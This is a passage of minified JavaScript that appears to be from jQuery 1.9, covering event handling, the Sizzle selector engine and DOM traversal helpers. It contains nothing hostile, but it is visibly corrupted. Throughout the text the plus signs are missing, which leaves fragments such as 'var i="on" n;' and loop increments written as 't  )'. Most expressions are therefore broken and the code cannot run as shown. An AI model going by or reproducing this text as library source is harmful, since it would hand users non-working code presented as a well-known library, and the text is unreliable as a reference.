st.Event,n,{type:e,isSimulated:!0,originalEvent:{}});r?st.event.trigger(i,null,t):st.event.dispatch.call(t,i),i.isDefaultPrevented()&&n.preventDefault()}},st.removeEvent=V.removeEventListener?function(e,t,n){e.removeEventListener&&e.removeEventListener(t,n,!1)}:function(e,n,r){var i="on" n;e.detachEvent&&(e[i]===t&&(e[i]=null),e.detachEvent(i,r))},st.Event=function(e,n){return this instanceof st.Event?(e&&e.type?(this.originalEvent=e,this.type=e.type,this.isDefaultPrevented=e.defaultPrevented||e.returnValue===!1||e.getPreventDefault&&e.getPreventDefault()?u:l):this.type=e,n&&st.extend(this,n),this.timeStamp=e&&e.timeStamp||st.now(),this[st.expando]=!0,t):new st.Event(e,n)},st.Event.prototype={isDefaultPrevented:l,isPropagationStopped:l,isImmediatePropagationStopped:l,preventDefault:function(){var e=this.originalEvent;this.isDefaultPrevented=u,e&&(e.preventDefault?e.preventDefault():e.returnValue=!1)},stopPropagation:function(){var e=this.originalEvent;this.isPropagationStopped=u,e&&(e.stopPropagation&&e.stopPropagation(),e.cancelBubble=!0)},stopImmediatePropagation:function(){this.isImmediatePropagationStopped=u,this.stopPropagation()}},st.each({mouseenter:"mouseover",mouseleave:"mouseout"},function(e,t){st.event.special[e]={delegateType:t,bindType:t,handle:function(e){var n,r=this,i=e.relatedTarget,o=e.handleObj;return(!i||i!==r&&!st.contains(r,i))&&(e.type=o.origType,n=o.handler.apply(this,arguments),e.type=t),n}}}),st.support.submitBubbles||(st.event.special.submit={setup:function(){return st.nodeName(this,"form")?!1:(st.event.add(this,"click._submit keypress._submit",function(e){var n=e.target,r=st.nodeName(n,"input")||st.nodeName(n,"button")?n.form:t;r&&!st._data(r,"submitBubbles")&&(st.event.add(r,"submit._submit",function(e){e._submit_bubble=!0}),st._data(r,"submitBubbles",!0))}),t)},postDispatch:function(e){e._submit_bubble&&(delete e._submit_bubble,this.parentNode&&!e.isTrigger&&st.event.simulate("submit",this.parentNode,e,!0))},teardown:function(){return st.nodeName(this,"form")?!1:(st.event.remove(this,"._submit"),t)}}),st.support.changeBubbles||(st.event.special.change={setup:function(){return qt.test(this.nodeName)?(("checkbox"===this.type||"radio"===this.type)&&(st.event.add(this,"propertychange._change",function(e){"checked"===e.originalEvent.propertyName&&(this._just_changed=!0)}),st.event.add(this,"click._change",function(e){this._just_changed&&!e.isTrigger&&(this._just_changed=!1),st.event.simulate("change",this,e,!0)})),!1):(st.event.add(this,"beforeactivate._change",function(e){var t=e.target;qt.test(t.nodeName)&&!st._data(t,"changeBubbles")&&(st.event.add(t,"change._change",function(e){!this.parentNode||e.isSimulated||e.isTrigger||st.event.simulate("change",this.parentNode,e,!0)}),st._data(t,"changeBubbles",!0))}),t)},handle:function(e){var n=e.target;return this!==n||e.isSimulated||e.isTrigger||"radio"!==n.type&&"checkbox"!==n.type?e.handleObj.handler.apply(this,arguments):t},teardown:function(){return st.event.remove(this,"._change"),!qt.test(this.nodeName)}}),st.support.focusinBubbles||st.each({focus:"focusin",blur:"focusout"},function(e,t){var n=0,r=function(e){st.event.simulate(t,e.target,st.event.fix(e),!0)};st.event.special[t]={setup:function(){0===n  &&V.addEventListener(e,r,!0)},teardown:function(){0===--n&&V.removeEventListener(e,r,!0)}}}),st.fn.extend({on:function(e,n,r,i,o){var a,s;if("object"==typeof e){"string"!=typeof n&&(r=r||n,n=t);for(s in e)this.on(s,n,r,e[s],o);return this}if(null==r&&null==i?(i=n,r=n=t):null==i&&("string"==typeof n?(i=r,r=t):(i=r,r=n,n=t)),i===!1)i=l;else if(!i)return this;return 1===o&&(a=i,i=function(e){return st().off(e),a.apply(this,arguments)},i.guid=a.guid||(a.guid=st.guid  )),this.each(function(){st.event.add(this,e,i,r,n)})},one:function(e,t,n,r){return this.on(e,t,n,r,1)},off:function(e,n,r){var i,o;if(e&&e.preventDefault&&e.handleObj)return i=e.handleObj,st(e.delegateTarget).off(i.namespace?i.origType "." i.namespace:i.origType,i.selector,i.handler),this;if("object"==typeof e){for(o in e)this.off(o,n,e[o]);return this}return(n===!1||"function"==typeof n)&&(r=n,n=t),r===!1&&(r=l),this.each(function(){st.event.remove(this,e,r,n)})},bind:function(e,t,n){return this.on(e,null,t,n)},unbind:function(e,t){return this.off(e,null,t)},delegate:function(e,t,n,r){return this.on(t,e,n,r)},undelegate:function(e,t,n){return 1===arguments.length?this.off(e,"**"):this.off(t,e||"**",n)},trigger:function(e,t){return this.each(function(){st.event.trigger(e,t,this)})},triggerHandler:function(e,n){var r=this[0];return r?st.event.trigger(e,n,r,!0):t},hover:function(e,t){return this.mouseenter(e).mouseleave(t||e)}}),st.each("blur focus focusin focusout load resize scroll unload click dblclick mousedown mouseup mousemove mouseover mouseout mouseenter mouseleave change select submit keydown keypress keyup error contextmenu".split(" "),function(e,t){st.fn[t]=function(e,n){return arguments.length>0?this.on(t,null,e,n):this.trigger(t)},_t.test(t)&&(st.event.fixHooks[t]=st.event.keyHooks),Ft.test(t)&&(st.event.fixHooks[t]=st.event.mouseHooks)}),function(e,t){function n(e){return ht.test(e "")}function r(){var e,t=[];return e=function(n,r){return t.push(n =" ")>C.cacheLength&&delete e[t.shift()],e[n]=r}}function i(e){return e[P]=!0,e}function o(e){var t=L.createElement("div");try{return e(t)}catch(n){return!1}finally{t=null}}function a(e,t,n,r){var i,o,a,s,u,l,c,d,h,g;if((t?t.ownerDocument||t:R)!==L&&D(t),t=t||L,n=n||[],!e||"string"!=typeof e)return n;if(1!==(s=t.nodeType)&&9!==s)return[];if(!M&&!r){if(i=gt.exec(e))if(a=i[1]){if(9===s){if(o=t.getElementById(a),!o||!o.parentNode)return n;if(o.id===a)return n.push(o),n}else if(t.ownerDocument&&(o=t.ownerDocument.getElementById(a))&&O(t,o)&&o.id===a)return n.push(o),n}else{if(i[2])return Q.apply(n,K.call(t.getElementsByTagName(e),0)),n;if((a=i[3])&&W.getByClassName&&t.getElementsByClassName)return Q.apply(n,K.call(t.getElementsByClassName(a),0)),n}if(W.qsa&&!q.test(e)){if(c=!0,d=P,h=t,g=9===s&&e,1===s&&"object"!==t.nodeName.toLowerCase()){for(l=f(e),(c=t.getAttribute("id"))?d=c.replace(vt,"\\$&"):t.setAttribute("id",d),d="[id='" d "'] ",u=l.length;u--;)l[u]=d p(l[u]);h=dt.test(e)&&t.parentNode||t,g=l.join(",")}if(g)try{return Q.apply(n,K.call(h.querySelectorAll(g),0)),n}catch(m){}finally{c||t.removeAttribute("id")}}}return x(e.replace(at,"$1"),t,n,r)}function s(e,t){for(var n=e&&t&&e.nextSibling;n;n=n.nextSibling)if(n===t)return-1;return e?1:-1}function u(e){return function(t){var n=t.nodeName.toLowerCase();return"input"===n&&t.type===e}}function l(e){return function(t){var n=t.nodeName.toLowerCase();return("input"===n||"button"===n)&&t.type===e}}function c(e){return i(function(t){return t= t,i(function(n,r){for(var i,o=e([],n.length,t),a=o.length;a--;)n[i=o[a]]&&(n[i]=!(r[i]=n[i]))})})}function f(e,t){var n,r,i,o,s,u,l,c=X[e " "];if(c)return t?0:c.slice(0);for(s=e,u=[],l=C.preFilter;s;){(!n||(r=ut.exec(s)))&&(r&&(s=s.slice(r[0].length)||s),u.push(i=[])),n=!1,(r=lt.exec(s))&&(n=r.shift(),i.push({value:n,type:r[0].replace(at," ")}),s=s.slice(n.length));for(o in C.filter)!(r=pt[o].exec(s))||l[o]&&!(r=l[o](r))||(n=r.shift(),i.push({value:n,type:o,matches:r}),s=s.slice(n.length));if(!n)break}return t?s.length:s?a.error(e):X(e,u).slice(0)}function p(e){for(var t=0,n=e.length,r="";n>t;t  )r =e[t].value;return r}function d(e,t,n){var r=t.dir,i=n&&"parentNode"===t.dir,o=I  ;return t.first?function(t,n,o){for(;t=t[r];)if(1===t.nodeType||i)return e(t,n,o)}:function(t,n,a){var s,u,l,c=$ " " o;if(a){for(;t=t[r];)if((1===t.nodeType||i)&&e(t,n,a))return!0}else for(;t=t[r];)if(1===t.nodeType||i)if(l=t[P]||(t[P]={}),(u=l[r])&&u[0]===c){if((s=u[1])===!0||s===N)return s===!0}else if(u=l[r]=[c],u[1]=e(t,n,a)||N,u[1]===!0)return!0}}function h(e){return e.length>1?function(t,n,r){for(var i=e.length;i--;)if(!e[i](t,n,r))return!1;return!0}:e[0]}function g(e,t,n,r,i){for(var o,a=[],s=0,u=e.length,l=null!=t;u>s;s  )(o=e[s])&&(!n||n(o,r,i))&&(a.push(o),l&&t.push(s));return a}function m(e,t,n,r,o,a){return r&&!r[P]&&(r=m(r)),o&&!o[P]&&(o=m(o,a)),i(function(i,a,s,u){var l,c,f,p=[],d=[],h=a.length,m=i||b(t||"*",s.nodeType?[s]:s,[]),y=!e||!i&&t?m:g(m,p,e,s,u),v=n?o||(i?e:h||r)?[]:a:y;if(n&&n(y,v,s,u),r)for(l=g(v,d),r(l,[],s,u),c=l.length;c--;)(f=l[c])&&(v[d[c]]=!(y[d[c]]=f));if(i){if(o||e){if(o){for(l=[],c=v.length;c--;)(f=v[c])&&l.push(y[c]=f);o(null,v=[],l,u)}for(c=v.length;c--;)(f=v[c])&&(l=o?Z.call(i,f):p[c])>-1&&(i[l]=!(a[l]=f))}}else v=g(v===a?v.splice(h,v.length):v),o?o(null,a,v,u):Q.apply(a,v)})}function y(e){for(var t,n,r,i=e.length,o=C.relative[e[0].type],a=o||C.relative[" "],s=o?1:0,u=d(function(e){return e===t},a,!0),l=d(function(e){return Z.call(t,e)>-1},a,!0),c=[function(e,n,r){return!o&&(r||n!==j)||((t=n).nodeType?u(e,n,r):l(e,n,r))}];i>s;s  )if(n=C.relative[e[s].type])c=[d(h(c),n)];else{if(n=C.filter[e[s].type].apply(null,e[s].matches),n[P]){for(r=  s;i>r&&!C.relative[e[r].type];r  );return m(s>1&&h(c),s>1&&p(e.slice(0,s-1)).replace(at,"$1"),n,r>s&&y(e.slice(s,r)),i>r&&y(e=e.slice(r)),i>r&&p(e))}c.push(n)}return h(c)}function v(e,t){var n=0,r=t.length>0,o=e.length>0,s=function(i,s,u,l,c){var f,p,d,h=[],m=0,y="0",v=i&&[],b=null!=c,x=j,T=i||o&&C.find.TAG("*",c&&s.parentNode||s),w=$ =null==x?1:Math.E;for(b&&(j=s!==L&&s,N=n);null!=(f=T[y]);y  ){if(o&&f){for(p=0;d=e[p];p  )if(d(f,s,u)){l.push(f);break}b&&($=w,N=  n)}r&&((f=!d&&f)&&m--,i&&v.push(f))}if(m =y,r&&y!==m){for(p=0;d=t[p];p  )d(v,h,s,u);if(i){if(m>0)for(;y--;)v[y]||h[y]||(h[y]=G.call(l));h=g(h)}Q.apply(l,h),b&&!i&&h.length>0&&m t.length>1&&a.uniqueSort(l)}return b&&($=w,j=x),v};return r?i(s):s}function b(e,t,n){for(var r=0,i=t.length;i>r;r  )a(e,t[r],n);return n}function x(e,t,n,r){var i,o,a,s,u,l=f(e);if(!r&&1===l.length){if(o=l[0]=l[0].slice(0),o.length>2&&"ID"===(a=o[0]).type&&9===t.nodeType&&!M&&C.relative[o[1].type]){if(t=C.find.ID(a.matches[0].replace(xt,Tt),t)[0],!t)return n;e=e.slice(o.shift().value.length)}for(i=pt.needsContext.test(e)?-1:o.length-1;i>=0&&(a=o[i],!C.relative[s=a.type]);i--)if((u=C.find[s])&&(r=u(a.matches[0].replace(xt,Tt),dt.test(o[0].type)&&t.parentNode||t))){if(o.splice(i,1),e=r.length&&p(o),!e)return Q.apply(n,K.call(r,0)),n;break}}return S(e,l)(r,t,M,n,dt.test(e)),n}function T(){}var w,N,C,k,E,S,A,j,D,L,H,M,q,_,F,O,B,P="sizzle" -new Date,R=e.document,W={},$=0,I=0,z=r(),X=r(),U=r(),V=typeof t,Y=1<<31,J=[],G=J.pop,Q=J.push,K=J.slice,Z=J.indexOf||function(e){for(var t=0,n=this.length;n>t;t  )if(this[t]===e)return t;return-1},et="[\\x20\\t\\r\\n\\f]",tt="(?:\\\\.|[\\w-]|[^\\x00-\\xa0]) ",nt=tt.replace("w","w#"),rt="([*^$|!~]?=)",it="\\[" et "*(" tt ")" et "*(?:" rt et "*(?:(['\"])((?:\\\\.|[^\\\\])*?)\\3|(" nt ")|)|)" et "*\\]",ot=":(" tt ")(?:\\(((['\"])((?:\\\\.|[^\\\\])*?)\\3|((?:\\\\.|[^\\\\()[\\]]|" it.replace(3,8) ")*)|.*)\\)|)",at=RegExp("^" et " |((?:^|[^\\\\])(?:\\\\.)*)" et " $","g"),ut=RegExp("^" et "*," et "*"),lt=RegExp("^" et "*([\\x20\\t\\r\\n\\f> ~])" et "*"),ct=RegExp(ot),ft=RegExp("^" nt "$"),pt={ID:RegExp("^#(" tt ")"),CLASS:RegExp("^\\.(" tt ")"),NAME:RegExp("^\\[name=['\"]?(" tt ")['\"]?\\]"),TAG:RegExp("^(" tt.replace("w","w*") ")"),ATTR:RegExp("^" it),PSEUDO:RegExp("^" ot),CHILD:RegExp("^:(only|first|last|nth|nth-last)-(child|of-type)(?:\\(" et "*(even|odd|(([ -]|)(\\d*)n|)" et "*(?:([ -]|)" et "*(\\d )|))" et "*\\)|)","i"),needsContext:RegExp("^" et "*[> ~]|:(even|odd|eq|gt|lt|nth|first|last)(?:\\(" et "*((?:-\\d)?\\d*)" et "*\\)|)(?=[^-]|$)","i")},dt=/[\x20\t\r\n\f]*[ ~]/,ht=/\{\s*\[native code\]\s*\}/,gt=/^(?:#([\w-] )|(\w )|\.([\w-] ))$/,mt=/^(?:input|select|textarea|button)$/i,yt=/^h\d$/i,vt=/'|\\/g,bt=/\=[\x20\t\r\n\f]*([^'"\]]*)[\x20\t\r\n\f]*\]/g,xt=/\\([\da-fA-F]{1,6}[\x20\t\r\n\f]?|.)/g,Tt=function(e,t){var n="0x" t-65536;return n!==n?t:0>n?String.fromCharCode(n 65536):String.fromCharCode(55296|n>>10,56320|1023&n)};try{K.call(H.childNodes,0)[0].nodeType}catch(wt){K=function(e){for(var t,n=[];t=this[e];e  )n.push(t);return n}}E=a.isXML=function(e){var t=e&&(e.ownerDocument||e).documentElement;return t?"HTML"!==t.nodeName:!1},D=a.setDocument=function(e){var r=e?e.ownerDocument||e:R;return r!==L&&9===r.nodeType&&r.documentElement?(L=r,H=r.documentElement,M=E(r),W.tagNameNoComments=o(function(e){return e.appendChild(r.createComment("")),!e.getElementsByTagName("*").length}),W.attributes=o(function(e){e.innerHTML="<select></select>";var t=typeof e.lastChild.getAttribute("multiple");return"boolean"!==t&&"string"!==t}),W.getByClassName=o(function(e){return e.innerHTML="<div class='hidden e'></div><div class='hidden'></div>",e.getElementsByClassName&&e.getElementsByClassName("e").length?(e.lastChild.className="e",2===e.getElementsByClassName("e").length):!1}),W.getByName=o(function(e){e.id=P 0,e.innerHTML="<a name='" P "'></a><div name='" P "'></div>",H.insertBefore(e,H.firstChild);var t=r.getElementsByName&&r.getElementsByName(P).length===2 r.getElementsByName(P 0).length;return W.getIdNotName=!r.getElementById(P),H.removeChild(e),t}),C.attrHandle=o(function(e){return e.innerHTML="<a href='#'></a>",e.firstChild&&typeof e.firstChild.getAttribute!==V&&"#"===e.firstChild.getAttribute("href")})?{}:{href:function(e){return e.getAttribute("href",2)},type:function(e){return e.getAttribute("type")}},W.getIdNotName?(C.find.ID=function(e,t){if(typeof t.getElementById!==V&&!M){var n=t.getElementById(e);return n&&n.parentNode?[n]:[]}},C.filter.ID=function(e){var t=e.replace(xt,Tt);return function(e){return e.getAttribute("id")===t}}):(C.find.ID=function(e,n){if(typeof n.getElementById!==V&&!M){var r=n.getElementById(e);return r?r.id===e||typeof r.getAttributeNode!==V&&r.getAttributeNode("id").value===e?[r]:t:[]}},C.filter.ID=function(e){var t=e.replace(xt,Tt);return function(e){var n=typeof e.getAttributeNode!==V&&e.getAttributeNode("id");return n&&n.value===t}}),C.find.TAG=W.tagNameNoComments?function(e,n){return typeof n.getElementsByTagName!==V?n.getElementsByTagName(e):t}:function(e,t){var n,r=[],i=0,o=t.getElementsByTagName(e);if("*"===e){for(;n=o[i];i  )1===n.nodeType&&r.push(n);return r}return o},C.find.NAME=W.getByName&&function(e,n){return typeof n.getElementsByName!==V?n.getElementsByName(name):t},C.find.CLASS=W.getByClassName&&function(e,n){return typeof n.getElementsByClassName===V||M?t:n.getElementsByClassName(e)},_=[],q=[":focus"],(W.qsa=n(r.querySelectorAll))&&(o(function(e){e.innerHTML="<select><option selected=''></option></select>",e.querySelectorAll("[selected]").length||q.push("\\[" et "*(?:checked|disabled|ismap|multiple|readonly|selected|value)"),e.querySelectorAll(":checked").length||q.push(":checked")}),o(function(e){e.innerHTML="<input type='hidden' i=''/>",e.querySelectorAll("[i^='']").length&&q.push("[*^$]=" et "*(?:\"\"|'')"),e.querySelectorAll(":enabled").length||q.push(":enabled",":disabled"),e.querySelectorAll("*,:x"),q.push(",.*:")})),(W.matchesSelector=n(F=H.matchesSelector||H.mozMatchesSelector||H.webkitMatchesSelector||H.oMatchesSelector||H.msMatchesSelector))&&o(function(e){W.disconnectedMatch=F.call(e,"div"),F.call(e,"[s!='']:x"),_.push("!=",ot)}),q=RegExp(q.join("|")),_=RegExp(_.join("|")),O=n(H.contains)||H.compareDocumentPosition?function(e,t){var n=9===e.nodeType?e.documentElement:e,r=t&&t.parentNode;return e===r||!(!r||1!==r.nodeType||!(n.contains?n.contains(r):e.compareDocumentPosition&&16&e.compareDocumentPosition(r)))}:function(e,t){if(t)for(;t=t.parentNode;)if(t===e)return!0;return!1},B=H.compareDocumentPosition?function(e,t){var n;return e===t?(A=!0,0):(n=t.compareDocumentPosition&&e.compareDocumentPosition&&e.compareDocumentPosition(t))?1&n||e.parentNode&&11===e.parentNode.nodeType?e===r||O(R,e)?-1:t===r||O(R,t)?1:0:4&n?-1:1:e.compareDocumentPosition?-1:1}:function(e,t){var n,i=0,o=e.parentNode,a=t.parentNode,u=[e],l=[t];if(e===t)return A=!0,0;if(e.sourceIndex&&t.sourceIndex)return(~t.sourceIndex||Y)-(O(R,e)&&~e.sourceIndex||Y);if(!o||!a)return e===r?-1:t===r?1:o?-1:a?1:0;if(o===a)return s(e,t);for(n=e;n=n.parentNode;)u.unshift(n);for(n=t;n=n.parentNode;)l.unshift(n);for(;u[i]===l[i];)i  ;return i?s(u[i],l[i]):u[i]===R?-1:l[i]===R?1:0},A=!1,[0,0].sort(B),W.detectDuplicates=A,L):L},a.matches=function(e,t){return a(e,null,null,t)},a.matchesSelector=function(e,t){if((e.ownerDocument||e)!==L&&D(e),t=t.replace(bt,"='$1']"),!(!W.matchesSelector||M||_&&_.test(t)||q.test(t)))try{var n=F.call(e,t);if(n||W.disconnectedMatch||e.document&&11!==e.document.nodeType)return n}catch(r){}return a(t,L,null,[e]).length>0},a.contains=function(e,t){return(e.ownerDocument||e)!==L&&D(e),O(e,t)},a.attr=function(e,t){var n;return(e.ownerDocument||e)!==L&&D(e),M||(t=t.toLowerCase()),(n=C.attrHandle[t])?n(e):M||W.attributes?e.getAttribute(t):((n=e.getAttributeNode(t))||e.getAttribute(t))&&e[t]===!0?t:n&&n.specified?n.value:null},a.error=function(e){throw Error("Syntax error, unrecognized expression: " e)},a.uniqueSort=function(e){var t,n=[],r=1,i=0;if(A=!W.detectDuplicates,e.sort(B),A){for(;t=e[r];r  )t===e[r-1]&&(i=n.push(r));for(;i--;)e.splice(n[i],1)}return e},k=a.getText=function(e){var t,n="",r=0,i=e.nodeType;if(i){if(1===i||9===i||11===i){if("string"==typeof e.textContent)return e.textContent;for(e=e.firstChild;e;e=e.nextSibling)n =k(e)}else if(3===i||4===i)return e.nodeValue}else for(;t=e[r];r  )n =k(t);return n},C=a.selectors={cacheLength:50,createPseudo:i,match:pt,find:{},relative:{">":{dir:"parentNode",first:!0}," ":{dir:"parentNode"}," ":{dir:"previousSibling",first:!0},"~":{dir:"previousSibling"}},preFilter:{ATTR:function(e){return e[1]=e[1].replace(xt,Tt),e[3]=(e[4]||e[5]||"").replace(xt,Tt),"~="===e[2]&&(e[3]=" " e[3] " "),e.slice(0,4)},CHILD:function(e){return e[1]=e[1].toLowerCase(),"nth"===e[1].slice(0,3)?(e[3]||a.error(e[0]),e[4]= (e[4]?e[5] (e[6]||1):2*("even"===e[3]||"odd"===e[3])),e[5]= (e[7] e[8]||"odd"===e[3])):e[3]&&a.error(e[0]),e},PSEUDO:function(e){var t,n=!e[5]&&e[2];return pt.CHILD.test(e[0])?null:(e[4]?e[2]=e[4]:n&&ct.test(n)&&(t=f(n,!0))&&(t=n.indexOf(")",n.length-t)-n.length)&&(e[0]=e[0].slice(0,t),e[2]=n.slice(0,t)),e.slice(0,3))}},filter:{TAG:function(e){return"*"===e?function(){return!0}:(e=e.replace(xt,Tt).toLowerCase(),function(t){return t.nodeName&&t.nodeName.toLowerCase()===e})},CLASS:function(e){var t=z[e " "];return t||(t=RegExp("(^|" et ")" e "(" et "|$)"))&&z(e,function(e){return t.test(e.className||typeof e.getAttribute!==V&&e.getAttribute("class")||"")})},ATTR:function(e,t,n){return function(r){var i=a.attr(r,e);return null==i?"!="===t:t?(i ="","="===t?i===n:"!="===t?i!==n:"^="===t?n&&0===i.indexOf(n):"*="===t?n&&i.indexOf(n)>-1:"$="===t?n&&i.substr(i.length-n.length)===n:"~="===t?(" " i " ").indexOf(n)>-1:"|="===t?i===n||i.substr(0,n.length 1)===n "-":!1):!0}},CHILD:function(e,t,n,r,i){var o="nth"!==e.slice(0,3),a="last"!==e.slice(-4),s="of-type"===t;return 1===r&&0===i?function(e){return!!e.parentNode}:function(t,n,u){var l,c,f,p,d,h,g=o!==a?"nextSibling":"previousSibling",m=t.parentNode,y=s&&t.nodeName.toLowerCase(),v=!u&&!s;if(m){if(o){for(;g;){for(f=t;f=f[g];)if(s?f.nodeName.toLowerCase()===y:1===f.nodeType)return!1;h=g="only"===e&&!h&&"nextSibling"}return!0}if(h=[a?m.firstChild:m.lastChild],a&&v){for(c=m[P]||(m[P]={}),l=c[e]||[],d=l[0]===$&&l[1],p=l[0]===$&&l[2],f=d&&m.childNodes[d];f=  d&&f&&f[g]||(p=d=0)||h.pop();)if(1===f.nodeType&&  p&&f===t){c[e]=[$,d,p];break}}else if(v&&(l=(t[P]||(t[P]={}))[e])&&l[0]===$)p=l[1];else for(;(f=  d&&f&&f[g]||(p=d=0)||h.pop())&&((s?f.nodeName.toLowerCase()!==y:1!==f.nodeType)||!  p||(v&&((f[P]||(f[P]={}))[e]=[$,p]),f!==t)););return p-=i,p===r||0===p%r&&p/r>=0}}},PSEUDO:function(e,t){var n,r=C.pseudos[e]||C.setFilters[e.toLowerCase()]||a.error("unsupported pseudo: " e);return r[P]?r(t):r.length>1?(n=[e,e,"",t],C.setFilters.hasOwnProperty(e.toLowerCase())?i(function(e,n){for(var i,o=r(e,t),a=o.length;a--;)i=Z.call(e,o[a]),e[i]=!(n[i]=o[a])}):function(e){return r(e,0,n)}):r}},pseudos:{not:i(function(e){var t=[],n=[],r=S(e.replace(at,"$1"));return r[P]?i(function(e,t,n,i){for(var o,a=r(e,null,i,[]),s=e.length;s--;)(o=a[s])&&(e[s]=!(t[s]=o))}):function(e,i,o){return t[0]=e,r(t,null,o,n),!n.pop()}}),has:i(function(e){return function(t){return a(e,t).length>0}}),contains:i(function(e){return function(t){return(t.textContent||t.innerText||k(t)).indexOf(e)>-1}}),lang:i(function(e){return ft.test(e||"")||a.error("unsupported lang: " e),e=e.replace(xt,Tt).toLowerCase(),function(t){var n;do if(n=M?t.getAttribute("xml:lang")||t.getAttribute("lang"):t.lang)return n=n.toLowerCase(),n===e||0===n.indexOf(e "-");while((t=t.parentNode)&&1===t.nodeType);return!1}}),target:function(t){var n=e.location&&e.location.hash;return n&&n.slice(1)===t.id},root:function(e){return e===H},focus:function(e){return e===L.activeElement&&(!L.hasFocus||L.hasFocus())&&!!(e.type||e.href||~e.tabIndex)},enabled:function(e){return e.disabled===!1},disabled:function(e){return e.disabled===!0},checked:function(e){var t=e.nodeName.toLowerCase();return"input"===t&&!!e.checked||"option"===t&&!!e.selected},selected:function(e){return e.parentNode&&e.parentNode.selectedIndex,e.selected===!0},empty:function(e){for(e=e.firstChild;e;e=e.nextSibling)if(e.nodeName>"@"||3===e.nodeType||4===e.nodeType)return!1;return!0},parent:function(e){return!C.pseudos.empty(e)},header:function(e){return yt.test(e.nodeName)},input:function(e){return mt.test(e.nodeName)},button:function(e){var t=e.nodeName.toLowerCase();return"input"===t&&"button"===e.type||"button"===t},text:function(e){var t;return"input"===e.nodeName.toLowerCase()&&"text"===e.type&&(null==(t=e.getAttribute("type"))||t.toLowerCase()===e.type)},first:c(function(){return[0]}),last:c(function(e,t){return[t-1]}),eq:c(function(e,t,n){return[0>n?n t:n]}),even:c(function(e,t){for(var n=0;t>n;n =2)e.push(n);return e}),odd:c(function(e,t){for(var n=1;t>n;n =2)e.push(n);return e}),lt:c(function(e,t,n){for(var r=0>n?n t:n;--r>=0;)e.push(r);return e}),gt:c(function(e,t,n){for(var r=0>n?n t:n;t>  r;)e.push(r);return e})}};for(w in{radio:!0,checkbox:!0,file:!0,password:!0,image:!0})C.pseudos[w]=u(w);for(w in{submit:!0,reset:!0})C.pseudos[w]=l(w);S=a.compile=function(e,t){var n,r=[],i=[],o=U[e " "];if(!o){for(t||(t=f(e)),n=t.length;n--;)o=y(t[n]),o[P]?r.push(o):i.push(o);o=U(e,v(i,r))}return o},C.pseudos.nth=C.pseudos.eq,C.filters=T.prototype=C.pseudos,C.setFilters=new T,D(),a.attr=st.attr,st.find=a,st.expr=a.selectors,st.expr[":"]=st.expr.pseudos,st.unique=a.uniqueSort,st.text=a.getText,st.isXMLDoc=a.isXML,st.contains=a.contains}(e);var Pt=/Until$/,Rt=/^(?:parents|prev(?:Until|All))/,Wt=/^.[^:#\[\.,]*$/,$t=st.expr.match.needsContext,It={children:!0,contents:!0,next:!0,prev:!0};st.fn.extend({find:function(e){var t,n,r;if("string"!=typeof e)return r=this,this.pushStack(st(e).filter(function(){for(t=0;r.length>t;t  )if(st.contains(r[t],this))return!0}));for(n=[],t=0;this.length>t;t  )st.find(e,this[t],n);return n=this.pushStack(st.unique(n)),n.selector=(this.selector?this.selector " ":"") e,n},has:function(e){var t,n=st(e,this),r=n.length;return this.filter(function(){for(t=0;r>t;t  )if(st.contains(this,n[t]))return!0})},not:function(e){return this.pushStack(f(this,e,!1))},filter:function(e){return this.pushStack(f(this,e,!0))},is:function(e){return!!e&&("string"==typeof e?$t.test(e)?st(e,this.context).index(this[0])>=0:st.filter(e,this).length>0:this.filter(e).length>0)},closest:function(e,t){for(var n,r=0,i=this.length,o=[],a=$t.test(e)||"string"!=typeof e?st(e,t||this.context):0;i>r;r  )for(n=this[r];n&&n.ownerDocument&&n!==t&&11!==n.nodeType;){if(a?a.index(n)>-1:st.find.matchesSelector(n,e)){o.push(n);break}n=n.parentNode}return this.pushStack(o.length>1?st.unique(o):o)},index:function(e){return e?"string"==typeof e?st.inArray(this[0],st(e)):st.inArray(e.jquery?e[0]:e,this):this[0]&&this[0].parentNode?this.first().prevAll().length:-1},add:function(e,t){var n="string"==typeof e?st(e,t):st.makeArray(e&&e.nodeType?[e]:e),r=st.merge(this.get(),n);return this.pushStack(st.unique(r))},addBack:function(e){return this.add(null==e?this.prevObject:this.prevObject.filter(e))}}),st.fn.andSelf=st.fn.addBack,st.each({parent:function(e){var t=e.parentNode;return t&&11!==t.nodeType?t:null},parents:function(e){return st.dir(e,"parentNode")},parentsUntil:function(e,t,n){return st.dir(e,"parentNode",n)},next:function(e){return c(e,"nextSibling")},prev:function(e){return c(e,"previousSibling")

},nextAll:function(e){return st.dir(e,"nextSibling")},prevAll:function(e){return st.dir(e,"previousSibling")},nextUntil:function(e,t,n){return st.dir(e,"nextSibling",n)},prevUntil:function(e,t,n){return st.dir(e,"previousSibling",n)},siblings:function(e){return st.sibling((e.parentNode||{}).firstChild,e)},children:function(e){return st.sibling(e.firstChild)},contents:function(e){return st.nodeName(e,"iframe")?e.contentDocument||e.contentWindow.document:st.merge([],e.childNodes)}},function(e,t){st.fn[e]=function(n,r){var i=st.map(this,t,n);return Pt.test(e)||(r=n),r&&"string"==typeof r&&(i=st.filter(r,i)),i=this.length>1&&!It[e]?st.unique(i):i,this.length>1&&Rt.test(e)&&(i=i.reverse()),this.pushStack(i)}}),st.extend({filter:function(e,t,n){return n&&(e=":not(" e ")"),1===t.length?st.find.matchesSelector(t[0],e)?[t[0]]:[]:st.find.matches(e,t)},dir:function(e,n,r){for(var i=[],o=e[n];o&&9!==o.nodeType&&(r===t||1!==o.nodeType||!st(o).is(r));)1===o.nodeType&&i.push(o),o=o[n];return i},sibling:function(e,t){for(var n=[];e;e=e.nextSibling)1===e.nodeType&&e!==t&&n.push(e);return n}});var zt="abbr|article|aside|audio|bdi|canvas|data|datalist|details|figcaption|figure|footer|header|hgroup|mark|meter|nav|output|progress|section|summary|time|video",Xt=/ jQuery\d ="(?:null|\d )"/g,Ut=RegExp("<(?:" zt ")[\\s/>]","i"),Vt=/^\s /,Yt=/<(?!area|br|col|embed|hr|img|input|link|meta|param)(([\w:] )[^>]*)\/>/gi,Jt=/<([\w:] )/,Gt=/<tbody/i,Qt=/<|&#?\w ;/,Kt=/<(?:script|style|link)/i,Zt=/^(?:checkbox|radio)$/i,en=/checked\s*(?:[^=]|=\s*.checked.)/i,tn=/^$|\/(?:java|ecma)script/i,nn=/^true\/(.*)/,rn=/^\s*<!(?:\[CDATA\[|--)|(?:\]\]|--)>\s*$/g,on={option:[1,"<select 